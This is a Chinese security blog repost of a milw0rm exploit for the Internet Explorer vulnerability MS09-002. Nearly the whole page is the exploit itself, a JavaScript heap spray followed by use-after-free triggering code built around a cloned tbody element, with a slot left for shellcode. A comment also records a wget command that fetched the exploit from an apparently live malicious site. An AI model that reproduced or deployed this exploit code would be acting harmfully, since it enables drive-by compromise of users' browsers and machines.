首页 > 网络安全 > MS09-002 0day

MS09-002 0day

复制内容到剪贴板程序代码程序代码
<!–
MS09-002
===============================
grabbed from:
wget http://www.chengjitj.com/bbs/images/alipay/mm/jc/jc.html –user-agent="MSIE 7.0; Windows NT 5.1"

took a little but found it. /str0ke
–>

<script language="JavaScript">

var c="putyourshizhere-unescaped";

var array = new Array();

var ls = 0x100000-(c.length*2+0x01020);

var b = unescape("%u0C0C%u0C0C");
while(b.length<ls/2) { b+=b;}
var lh = b.substring(0,ls/2);
delete b;

for(i=0; i<0xC0; i++) {
    array[i] = lh + c;
}

CollectGarbage();

var s1=unescape("%u0b0b%u0b0bAAAAAAAAAAAAAAAAAAAAAAAAA");
var a1 = new Array();
for(var x=0;x<1000;x++) a1.push(document.createElement("img"));

function ok() {
    o1=document.createElement("tbody");
    o1.click;
    var o2 = o1.cloneNode();
    o1.clearAttributes();
    o1=null; CollectGarbage();
    for(var x=0;x<a1.length;x++) a1[x].src=s1;
    o2.click;
}
</script><script>window.setTimeout("ok();",800);</script>

# milw0rm.com [2009-02-18]

转载请尊重版权,出处:秋天博客
本文链接: https://www.cfresh.net/web-security/329

  1. 还没有评论
评论提交中, 请稍候...

留言



注意: 您给他人的评论回复将通过邮件通知到对方。

可以使用的标签: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>
Trackbacks & Pingbacks ( 0 )
  1. 还没有 trackbacks